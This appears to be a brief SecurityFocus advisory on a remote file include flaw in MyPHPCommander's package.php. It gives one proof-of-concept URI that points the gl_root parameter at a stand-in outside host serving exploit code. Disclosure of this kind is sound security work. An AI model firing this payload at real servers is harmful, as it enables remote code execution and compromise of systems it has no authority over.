MyPHPCommander Package.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/myphpcommander_path/system/lib/package.php?gl_root=http://www.example2.com/exploit.txt?cmd


 

Privacy Statement
Copyright 2010, SecurityFocus